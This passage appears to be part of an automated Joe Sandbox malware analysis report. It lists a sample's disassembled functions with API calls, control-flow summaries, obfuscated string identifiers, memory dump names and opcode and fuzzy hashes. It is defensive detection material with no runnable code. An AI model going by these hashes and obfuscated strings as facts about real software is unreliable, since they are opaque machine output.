                                                                        • Opcode ID: d815b70299bf57c69e79bd4192dfdb5c237457d23841746adf81a7a0ebe726cc
                                                                        • Instruction ID: de8350e07a24f0323ac6076f08488e127e93fa124225f521850c0a455a92c3f7
                                                                        • Opcode Fuzzy Hash: d815b70299bf57c69e79bd4192dfdb5c237457d23841746adf81a7a0ebe726cc
                                                                        • Instruction Fuzzy Hash: 53F0E2706083805BD32A8B24DCD163FB7A5EB83718F10551CE3C2C6292DB21C8028A09
                                                                        Function 003DDED0 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 713 3dded0-3ddee3 714 3ddf3e-3ddf47 call 3db7e0 713->714 715 3ddf49-3ddf52 call 3db860 713->715 716 3ddef8-3ddf05 713->716 717 3ddeea-3ddef1 713->717 725 3ddf57-3ddf5a 714->725 724 3ddf54 715->724 718 3ddf10-3ddf27 716->718 717->715 717->716 718->718 721 3ddf29-3ddf3c RtlReAllocateHeap 718->721 721->724 724->725
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,00000000,00000000,00000001,?,00000000,00000000,003AB5FE,00000000,00000001), ref: 003DDF36
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 1c99060a32e3c3d6cf233c251940c51c46e7b9da6b807c9f7f5df752d7b88419
                                                                        • Instruction ID: a891345d030ff1f6952cfbe4e600c7b19d17321945213af53db776753c054668
                                                                        • Opcode Fuzzy Hash: 1c99060a32e3c3d6cf233c251940c51c46e7b9da6b807c9f7f5df752d7b88419
                                                                        • Instruction Fuzzy Hash: F3012B779082419BD7261B20FC629AB7B6CDFD7354F16047EE1839B750C628481AC292
                                                                        Function 003DB7E0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 726 3db7e0-3db7ff 727 3db800-3db83d 726->727 727->727 728 3db83f-3db85b RtlAllocateHeap 727->728
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 003DB84E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: cb9ac0356140702e8f2cf1a30979f6f9db0c067cd8d33f7869695b1e029cc3bd
                                                                        • Instruction ID: d4dcf6ca0cca6346aa3072972fd99de03982d73a1a7a29b605363faae6bd4bac
                                                                        • Opcode Fuzzy Hash: cb9ac0356140702e8f2cf1a30979f6f9db0c067cd8d33f7869695b1e029cc3bd
                                                                        • Instruction Fuzzy Hash: 49017633A457080BC301AE7CDC9465ABB96EFD9324F2A063DE5D4873D0DA31991AC295
                                                                        Function 003ACEB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 003ACEC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID:
                                                                        • API String ID: 640775948-0
                                                                        • Opcode ID: 9591bbf192dc925ea0fb63e1943941881811040594cebfabcb803b6226599314
                                                                        • Instruction ID: dfb55aa8b43b5d8422e2be1ec35eb283082f24174060f5990b1f7fa659c1a3e1
                                                                        • Opcode Fuzzy Hash: 9591bbf192dc925ea0fb63e1943941881811040594cebfabcb803b6226599314
                                                                        • Instruction Fuzzy Hash: EED012303D838177F9B64618DC53F10220A4715F69F30170CB322FE2D1C9D07141850C
                                                                        Function 003ACE80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 003ACE94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: 27aa39eaf6e9401537341525b29161cfb53896fe8662478381c08d5e7afc4189
                                                                        • Instruction ID: fa063578871f334b5f8298f7fa9cde726df0de1d3f0bd3b8a1d6bb755914815d
                                                                        • Opcode Fuzzy Hash: 27aa39eaf6e9401537341525b29161cfb53896fe8662478381c08d5e7afc4189
                                                                        • Instruction Fuzzy Hash: 94D0A7213946A977D164A22CEC97F27325D87027A4F440726A662CE2C2DA517D158066

                                                                        Non-executed Functions

                                                                        Function 003A94D0 Relevance: 17.9, Strings: 14, Instructions: 385COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                                                                        • API String ID: 0-1787199350
                                                                        • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                                                        • Instruction ID: f34917ae79c494815f566e16514f627d5d5ed3370b7b31d8366ff5caa5f142c3
                                                                        • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                                                        • Instruction Fuzzy Hash: A6B1E67010C3818FD3168F2984607ABBFE1EF97354F19496DE4D59B392D779880ACB62
                                                                        Function 0056639A Relevance: 11.6, Strings: 8, Instructions: 1639COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (L<#$4@'z$OQ~w$\]F]$i=nv$l=x$se>?$v9
                                                                        • API String ID: 0-1834586532
                                                                        • Opcode ID: a0d8754ab52c2aa98d144e61ca235c1f26284ed19c18b2216a92b52e7a1962ef
                                                                        • Instruction ID: 4b877d3b375c9c4b41cc0217443bedf1a52163eb3edda6e4ac021559e9c929a6
                                                                        • Opcode Fuzzy Hash: a0d8754ab52c2aa98d144e61ca235c1f26284ed19c18b2216a92b52e7a1962ef
                                                                        • Instruction Fuzzy Hash: A3B218F3A0C2049FE304AE2DEC8567ABBE9EF94720F16493DEAC5C7744E63558008796
                                                                        Function 0056CFA2 Relevance: 10.4, Strings: 7, Instructions: 1618COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !}z$8o}$;O{$Co-o$d(2o$kbq=$gv
                                                                        • API String ID: 0-3022657688
                                                                        • Opcode ID: 2fc290378ef3f1da574b75cb0eab123209bd11855c77491ffa79840aa2affb95
                                                                        • Instruction ID: ca5ffb418383c960e2cb44f382102218f5bd77831235969f9032c5b8d060bdc9
                                                                        • Opcode Fuzzy Hash: 2fc290378ef3f1da574b75cb0eab123209bd11855c77491ffa79840aa2affb95
                                                                        • Instruction Fuzzy Hash: B8B2F6F360C2149FE304AE2DEC8567AFBE9EF94720F16492DEAC4C7744E63598018697
                                                                        Function 0056E9CC Relevance: 10.3, Strings: 7, Instructions: 1581COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 10U&$>{$@H?^$@{33$WOo_$ro$co
                                                                        • API String ID: 0-1003904059
                                                                        • Opcode ID: 52bb886706fbdccfd59eec0e902f113054dc92d6b9006e508ae45b4d0b9d0402
                                                                        • Instruction ID: 1f395e1e13c5fb4d907e28a6eb7047b13858b220f056d72c12bf34e6186fbe63
                                                                        • Opcode Fuzzy Hash: 52bb886706fbdccfd59eec0e902f113054dc92d6b9006e508ae45b4d0b9d0402
                                                                        • Instruction Fuzzy Hash: 88B206F350C2049FD304AE29EC8567AFBE5EF94720F168A3DEAC4C3744EA3598448697
                                                                        Function 003BDB30 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                                                                        • API String ID: 0-3274379026
                                                                        • Opcode ID: 9c488c27973e81f21f6a81d3ffbcdf51cd79c66cd43b56d2ba2c73c5c8821326
                                                                        • Instruction ID: 2c518bb10b920eba2ff510355af06e02212a7f1276bc65b6951e48381c1244c9
                                                                        • Opcode Fuzzy Hash: 9c488c27973e81f21f6a81d3ffbcdf51cd79c66cd43b56d2ba2c73c5c8821326
                                                                        • Instruction Fuzzy Hash: A95167725183918BD321CF25C8902ABBBF2FFD2305F09995CE8C18B695EB748906C782
                                                                        Function 003A4AC0 Relevance: 8.2, Strings: 6, Instructions: 665COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,T:$2L:$@O:$bK:$bM:$zQ:
                                                                        • API String ID: 0-763860872
                                                                        • Opcode ID: 0f95e38ed45b4a06ef9d54a987b71fc361df7a9d3bd825f45ccf5f8bbe72a5e0
                                                                        • Instruction ID: 346493c8ed15c94b810cd421d5189d19c3a88d1db8287c51073f0fbac76015f0
                                                                        • Opcode Fuzzy Hash: 0f95e38ed45b4a06ef9d54a987b71fc361df7a9d3bd825f45ccf5f8bbe72a5e0
                                                                        • Instruction Fuzzy Hash: 16427735608341DFD715CF28D890B5ABBE5FF89359F08892CE9898B291D379D984CF82
                                                                        Function 00567ECA Relevance: 8.0, Strings: 5, Instructions: 1703COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;Fsg$M3O$OUN$ZI!m$Ty
                                                                        • API String ID: 0-3158150873
                                                                        • Opcode ID: 4d1b8aed285a0d8846887d7c0be9787472d5d87d60c8e862e292815703aa0df2
                                                                        • Instruction ID: c8c0c420451301ed75d49bcf8cc3d81d07cd74a7737c2b01d8aeefe56dad7931
                                                                        • Opcode Fuzzy Hash: 4d1b8aed285a0d8846887d7c0be9787472d5d87d60c8e862e292815703aa0df2
                                                                        • Instruction Fuzzy Hash: 37B209F360C6049FE3046E2DEC8567BBBE9EF94720F16893DE6C5C7344E93598418692
                                                                        Function 003A9210 Relevance: 6.5, Strings: 5, Instructions: 269COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )=+4$57$7514$84*6$N
                                                                        • API String ID: 0-4020838272
